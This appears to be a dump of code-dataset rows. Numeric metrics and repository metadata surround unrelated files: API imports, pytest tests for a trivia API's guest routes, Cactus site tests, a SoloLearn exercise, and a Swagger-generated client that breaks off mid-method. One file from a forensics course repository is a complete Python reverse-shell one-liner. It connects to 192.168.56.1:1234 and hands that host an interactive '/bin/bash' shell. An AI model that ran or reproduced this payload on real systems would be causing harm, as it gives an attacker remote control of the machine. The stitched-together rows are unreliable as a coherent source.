| 16,743
| 541
| 121
| 30.948244
| 0.416184
| 0.139879
| 0
| 0.851064
| 0
| 0
| 0.013501
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00266
| false
| 0
| 0.005319
| 0
| 0.010638
| 0.00266
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b76c68ab661ace08d8abd6aeaef4ef7a76a60acc
| 109
|
py
|
Python
|
api/v1/generics/__init__.py
|
vulnman/vulnman
|
d48ee022bc0e4368060a990a527b1c7a5e437504
|
[
"MIT"
] | 3
|
2021-12-22T07:02:24.000Z
|
2022-01-27T20:19:11.000Z
|
api/v1/generics/__init__.py
|
vulnman/vulnman
|
d48ee022bc0e4368060a990a527b1c7a5e437504
|
[
"MIT"
] | 44
|
2021-12-14T07:24:29.000Z
|
2022-03-23T07:01:16.000Z
|
api/v1/generics/__init__.py
|
vulnman/vulnman
|
d48ee022bc0e4368060a990a527b1c7a5e437504
|
[
"MIT"
] | 1
|
2022-01-21T16:29:56.000Z
|
2022-01-21T16:29:56.000Z
|
from api.v1.generics.agents import AgentModelViewSet
from api.v1.generics.session import SessionModelViewSet
| 36.333333
| 55
| 0.87156
| 14
| 109
| 6.785714
| 0.642857
| 0.147368
| 0.189474
| 0.357895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019802
| 0.073395
| 109
| 2
| 56
| 54.5
| 0.920792
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b7ce8d7108417fe7d2882a144d44be43f9e5e0cf
| 2,718
|
py
|
Python
|
tests/test_guests.py
|
questionlp/api.wwdt.me_fastapi
|
fa8c24a36c5c6f2ece985a4d6e0e40201ac700dc
|
[
"Apache-2.0"
] | null | null | null |
tests/test_guests.py
|
questionlp/api.wwdt.me_fastapi
|
fa8c24a36c5c6f2ece985a4d6e0e40201ac700dc
|
[
"Apache-2.0"
] | 1
|
2022-01-03T15:48:29.000Z
|
2022-01-03T15:48:29.000Z
|
tests/test_guests.py
|
questionlp/api.wwdt.me_fastapi
|
fa8c24a36c5c6f2ece985a4d6e0e40201ac700dc
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2021 Linh Pham
# api.wwdt.me is released under the terms of the Apache License 2.0
"""Testing /v2.0/guests routes
"""
from fastapi.testclient import TestClient
import pytest
from app.main import app
from app.config import API_VERSION
client = TestClient(app)
def test_guests():
"""Test /v2.0/guests route"""
response = client.get(f"/v{API_VERSION}/guests")
guests = response.json()
assert response.status_code == 200
assert "guests" in guests
assert "id" in guests["guests"][0]
assert "name" in guests["guests"][0]
assert "slug" in guests["guests"][0]
@pytest.mark.parametrize("guest_id", [54])
def test_guests_id(guest_id: int):
"""Test /v2.0/guests/id/{guest_id} route"""
response = client.get(f"/v{API_VERSION}/guests/id/{guest_id}")
guest = response.json()
assert response.status_code == 200
assert "id" in guest
assert guest["id"] == guest_id
assert "name" in guest
assert "slug" in guest
@pytest.mark.parametrize("guest_slug", ["tom-hanks"])
def test_guests_slug(guest_slug: str):
"""Test /v2.0/guests/slug/{guest_slug} route"""
response = client.get(f"/v{API_VERSION}/guests/slug/{guest_slug}")
guest = response.json()
assert response.status_code == 200
assert "id" in guest
assert "name" in guest
assert "slug" in guest
assert guest["slug"] == guest_slug
def test_guests_details():
"""Test /v2.0/guests/details route"""
response = client.get(f"/v{API_VERSION}/guests/details")
guests = response.json()
assert response.status_code == 200
assert "guests" in guests
assert "id" in guests["guests"][0]
assert "name" in guests["guests"][0]
assert "slug" in guests["guests"][0]
assert "appearances" in guests["guests"][0]
@pytest.mark.parametrize("guest_id", [54])
def test_guests_details_id(guest_id: int):
"""Test /v2.0/guests/details/id/{guest_id} route"""
response = client.get(f"/v{API_VERSION}/guests/details/id/{guest_id}")
guest = response.json()
assert response.status_code == 200
assert "id" in guest
assert guest["id"] == guest_id
assert "name" in guest
assert "slug" in guest
assert "appearances" in guest
@pytest.mark.parametrize("guest_slug", ["tom-hanks"])
def test_guests_details_slug(guest_slug: str):
"""Test /v2.0/guests/details/slug/{guest_slug} route"""
response = client.get(f"/v{API_VERSION}/guests/details/slug/{guest_slug}")
guest = response.json()
assert response.status_code == 200
assert "id" in guest
assert "name" in guest
assert "slug" in guest
assert guest["slug"] == guest_slug
assert "appearances" in guest
| 27.734694
| 78
| 0.672553
| 394
| 2,718
| 4.522843
| 0.15736
| 0.054994
| 0.080247
| 0.058923
| 0.820988
| 0.790685
| 0.790685
| 0.790685
| 0.730079
| 0.704265
| 0
| 0.024172
| 0.178072
| 2,718
| 97
| 79
| 28.020619
| 0.7735
| 0.140545
| 0
| 0.7
| 0
| 0
| 0.188507
| 0.095777
| 0
| 0
| 0
| 0
| 0.55
| 1
| 0.1
| false
| 0
| 0.066667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b7df34ef0f8f02df1c1ff4889628631414c8c972
| 205
|
py
|
Python
|
src/factory.py
|
jamie-sgro/url-shortener
|
c833ab81927d9267a4012be0eba0e8a6409d7a85
|
[
"MIT"
] | null | null | null |
src/factory.py
|
jamie-sgro/url-shortener
|
c833ab81927d9267a4012be0eba0e8a6409d7a85
|
[
"MIT"
] | 15
|
2021-09-04T16:21:46.000Z
|
2021-09-13T14:59:31.000Z
|
src/factory.py
|
jamie-sgro/url-shortener
|
c833ab81927d9267a4012be0eba0e8a6409d7a85
|
[
"MIT"
] | null | null | null |
from src.database.i_db_accessor import IDbAccessor
from src.database.db_accessor import DbAccessor
class Factory:
@staticmethod
def create_db_accessor() -> IDbAccessor:
return DbAccessor
| 22.777778
| 50
| 0.77561
| 25
| 205
| 6.16
| 0.6
| 0.194805
| 0.194805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170732
| 205
| 8
| 51
| 25.625
| 0.905882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.333333
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
4d44bfa1f9122d2847c39289477578e12664366c
| 230
|
py
|
Python
|
Section 5/reverse_shell.py
|
PacktPublishing/Recipes-to-Successful-Python-Digital-Forensics
|
3217906559dddd80d88b2e774f13f90bf3d3caea
|
[
"MIT"
] | 13
|
2018-11-14T15:54:04.000Z
|
2021-12-19T17:19:58.000Z
|
Section 5/reverse_shell.py
|
PacktPublishing/Recipes-to-Successful-Python-Digital-Forensics
|
3217906559dddd80d88b2e774f13f90bf3d3caea
|
[
"MIT"
] | null | null | null |
Section 5/reverse_shell.py
|
PacktPublishing/Recipes-to-Successful-Python-Digital-Forensics
|
3217906559dddd80d88b2e774f13f90bf3d3caea
|
[
"MIT"
] | 10
|
2018-12-10T06:10:03.000Z
|
2022-01-21T03:59:51.000Z
|
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
| 230
| 230
| 0.695652
| 43
| 230
| 3.674419
| 0.604651
| 0.113924
| 0.132911
| 0.246835
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084444
| 0.021739
| 230
| 1
| 230
| 230
| 0.617778
| 0
| 0
| 0
| 0
| 1
| 0.943723
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
4ddae177c2ceaad52bdd3c2b55d7250cc0ead1a5
| 125
|
py
|
Python
|
sololearn/EasterEggs/EasterEggs.py
|
SneakyWizards/HackerRankSolutions
|
daf494e7775bb0de5afcfdcfd45aa73e6a950e0e
|
[
"RSA-MD"
] | 3
|
2020-01-08T18:33:11.000Z
|
2022-02-08T00:38:26.000Z
|
sololearn/EasterEggs/EasterEggs.py
|
SneakyWizards/HackerRankSolutions
|
daf494e7775bb0de5afcfdcfd45aa73e6a950e0e
|
[
"RSA-MD"
] | null | null | null |
sololearn/EasterEggs/EasterEggs.py
|
SneakyWizards/HackerRankSolutions
|
daf494e7775bb0de5afcfdcfd45aa73e6a950e0e
|
[
"RSA-MD"
] | 4
|
2020-08-08T22:02:23.000Z
|
2022-02-07T17:40:15.000Z
|
#!/usr/bin/python
if (int(input()) - int(input()) == int(input())):
print("Candy Time")
else:
print("Keep Hunting")
| 17.857143
| 49
| 0.576
| 17
| 125
| 4.235294
| 0.705882
| 0.333333
| 0.305556
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168
| 125
| 6
| 50
| 20.833333
| 0.692308
| 0.128
| 0
| 0
| 0
| 0
| 0.203704
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
4de5809dd3f74cb7ac057156578712691c645fe1
| 27
|
py
|
Python
|
src/models/CCIG/models/__init__.py
|
stillyuyi/ArticlePairMatching
|
f9cf63ad4c398d377f3d0291f552fb99f81020ef
|
[
"BSD-3-Clause"
] | 227
|
2019-05-22T14:10:55.000Z
|
2022-03-31T07:39:31.000Z
|
src/models/CCIG/models/__init__.py
|
stillyuyi/ArticlePairMatching
|
f9cf63ad4c398d377f3d0291f552fb99f81020ef
|
[
"BSD-3-Clause"
] | 35
|
2019-06-18T07:39:28.000Z
|
2021-11-19T03:51:07.000Z
|
src/models/CCIG/models/__init__.py
|
stillyuyi/ArticlePairMatching
|
f9cf63ad4c398d377f3d0291f552fb99f81020ef
|
[
"BSD-3-Clause"
] | 62
|
2019-06-14T07:10:30.000Z
|
2022-02-04T19:59:32.000Z
|
from .se_gcn import SE_GCN
| 13.5
| 26
| 0.814815
| 6
| 27
| 3.333333
| 0.666667
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 27
| 1
| 27
| 27
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1297db94e85d81c93e313888a5c420af6ef846fe
| 2,170
|
py
|
Python
|
cactus/tests/test_legacy_context.py
|
jacobmarshall-etc/Cactus
|
398ed4a1f57d0aa84fe3b297d7d27d0703683637
|
[
"BSD-3-Clause"
] | 1,048
|
2016-06-04T07:37:40.000Z
|
2022-03-06T02:03:16.000Z
|
cactus/tests/test_legacy_context.py
|
jacobmarshall-etc/Cactus
|
398ed4a1f57d0aa84fe3b297d7d27d0703683637
|
[
"BSD-3-Clause"
] | 49
|
2016-06-11T18:53:40.000Z
|
2021-09-29T07:07:53.000Z
|
cactus/tests/test_legacy_context.py
|
kamalx/Cactus
|
8badeff999b9e63092eef0bac2d33d1e6d7c50ed
|
[
"BSD-3-Clause"
] | 153
|
2016-06-04T08:55:22.000Z
|
2021-11-12T17:35:51.000Z
|
#coding:utf-8
import os
from cactus.tests import SiteTestCase
class TestLegacyContext(SiteTestCase):
def setUp(self):
super(TestLegacyContext, self).setUp()
os.mkdir(os.path.join(self.site.page_path, "test"))
with open(os.path.join(self.site.page_path, "static.html"), "w") as f:
f.write("{{ STATIC_URL }}")
with open(os.path.join(self.site.page_path, "test", "static.html"), "w") as f:
f.write("{{ STATIC_URL }}")
with open(os.path.join(self.site.page_path, "root.html"), "w") as f:
f.write("{{ ROOT_URL }}")
with open(os.path.join(self.site.page_path, "test", "root.html"), "w") as f:
f.write("{{ ROOT_URL }}")
with open(os.path.join(self.site.page_path, "page.html"), "w") as f:
f.write("{{ PAGE_URL }}")
def test_context(self):
self.site.build()
with open(os.path.join(self.site.build_path, "static.html")) as f:
self.assertEqual(f.read(), "./static")
with open(os.path.join(self.site.build_path, "test", "static.html")) as f:
self.assertEqual(f.read(), "../static")
with open(os.path.join(self.site.build_path, "root.html")) as f:
self.assertEqual(f.read(), ".")
with open(os.path.join(self.site.build_path, "test", "root.html")) as f:
self.assertEqual(f.read(), "..")
with open(os.path.join(self.site.build_path, "page.html")) as f:
self.assertEqual(f.read(), "page.html")
def test_pretty_urls(self):
self.site.prettify_urls = True
self.site.build()
with open(os.path.join(self.site.build_path, "test", "static", "index.html")) as f:
self.assertEqual(f.read(), "../../static")
with open(os.path.join(self.site.build_path, "root", "index.html")) as f:
self.assertEqual(f.read(), "..")
with open(os.path.join(self.site.build_path, "test", "root", "index.html")) as f:
self.assertEqual(f.read(), "../..")
with open(os.path.join(self.site.build_path, "page", "index.html")) as f:
self.assertEqual(f.read(), "page/")
| 35.57377
| 91
| 0.578341
| 309
| 2,170
| 3.983819
| 0.12945
| 0.116978
| 0.121852
| 0.170593
| 0.82697
| 0.82697
| 0.815597
| 0.815597
| 0.732738
| 0.705118
| 0
| 0.000597
| 0.22765
| 2,170
| 60
| 92
| 36.166667
| 0.73389
| 0.00553
| 0
| 0.205128
| 0
| 0
| 0.1465
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 1
| 0.076923
| false
| 0
| 0.051282
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
12c6ed49569bad6f213336433163250bfbfba61a
| 38,114
|
py
|
Python
|
swagger_codegen/swagger_client/api/default_api.py
|
DivSeek-Canada/divseek_mvp_api
|
2db16bc5b29acf2a7abea615270738e964e9368a
|
[
"MIT"
] | null | null | null |
swagger_codegen/swagger_client/api/default_api.py
|
DivSeek-Canada/divseek_mvp_api
|
2db16bc5b29acf2a7abea615270738e964e9368a
|
[
"MIT"
] | null | null | null |
swagger_codegen/swagger_client/api/default_api.py
|
DivSeek-Canada/divseek_mvp_api
|
2db16bc5b29acf2a7abea615270738e964e9368a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Divseek Canada MVP application API
Implements all the calls necessary for finding genomic markers for germplasm, but doesn't conform to BrAPI. # noqa: E501
OpenAPI spec version: 0.0.1
Contact: apiteam@swagger.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class DefaultApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_germplasm(self, **kwargs): # noqa: E501
"""Returns all germplasm we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_germplasm(async=True)
>>> result = thread.get()
:param async bool
:return: list[Germplasm]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_germplasm_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_germplasm_with_http_info(**kwargs) # noqa: E501
return data
def get_germplasm_with_http_info(self, **kwargs): # noqa: E501
"""Returns all germplasm we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_germplasm_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[Germplasm]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_germplasm" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/germplasm/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Germplasm]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_germplasm_by_id(self, id, **kwargs): # noqa: E501
"""Returns all germplasm we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_germplasm_by_id(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: Unique database ID for the germplasm (required)
:return: Germplasm
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_germplasm_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_germplasm_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_germplasm_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Returns all germplasm we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_germplasm_by_id_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: Unique database ID for the germplasm (required)
:return: Germplasm
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_germplasm_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_germplasm_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/germplasm/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Germplasm', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_germplasm_by_taxon(self, id, **kwargs): # noqa: E501
"""Returns all germplasm we have by taxon # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_germplasm_by_taxon(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: Unique database ID for the taxon (required)
:return: Germplasm
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_germplasm_by_taxon_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_germplasm_by_taxon_with_http_info(id, **kwargs) # noqa: E501
return data
def get_germplasm_by_taxon_with_http_info(self, id, **kwargs): # noqa: E501
"""Returns all germplasm we have by taxon # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_germplasm_by_taxon_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: Unique database ID for the taxon (required)
:return: Germplasm
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_germplasm_by_taxon" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_germplasm_by_taxon`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/germplasm/taxon/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Germplasm', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_locus_by_qtl(self, id, **kwargs): # noqa: E501
"""Returns all phenotypes for a germplasm that we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_locus_by_qtl(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: Unique database ID for the QTL (required)
:return: Locus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_locus_by_qtl_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_locus_by_qtl_with_http_info(id, **kwargs) # noqa: E501
return data
def get_locus_by_qtl_with_http_info(self, id, **kwargs): # noqa: E501
"""Returns all phenotypes for a germplasm that we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_locus_by_qtl_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: Unique database ID for the QTL (required)
:return: Locus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_locus_by_qtl" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_locus_by_qtl`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/locus/qtl/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Locus', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_locus_by_taxon(self, id, **kwargs): # noqa: E501
"""Returns all phenotypes for a germplasm that we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_locus_by_taxon(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: Unique database ID for the taaon (required)
:return: list[Locus]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_locus_by_taxon_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_locus_by_taxon_with_http_info(id, **kwargs) # noqa: E501
return data
def get_locus_by_taxon_with_http_info(self, id, **kwargs): # noqa: E501
"""Returns all phenotypes for a germplasm that we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_locus_by_taxon_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: Unique database ID for the taaon (required)
:return: list[Locus]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_locus_by_taxon" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_locus_by_taxon`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/locus/taxon/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Locus]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_qt_ls(self, **kwargs): # noqa: E501
"""Returns all the QTLs (Quantitative Trait Loci) we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_qt_ls(async=True)
>>> result = thread.get()
:param async bool
:return: list[QTL]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_qt_ls_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_qt_ls_with_http_info(**kwargs) # noqa: E501
return data
def get_qt_ls_with_http_info(self, **kwargs): # noqa: E501
"""Returns all the QTLs (Quantitative Trait Loci) we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_qt_ls_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[QTL]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_qt_ls" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/qtl/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[QTL]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_qtl_by_germplasm_trait(self, germplasm_id, trait_id, **kwargs): # noqa: E501
"""Returns all phenotypes for a germplasm that we have # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_qtl_by_germplasm_trait(germplasm_id, trait_id, async=True)
>>> result = thread.get()
:param async bool
:param str germplasm_id: Unique database ID for the germplasm (required)
:param str trait_id: Unique database ID for the trait in question (required)
:return: list[QTL]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
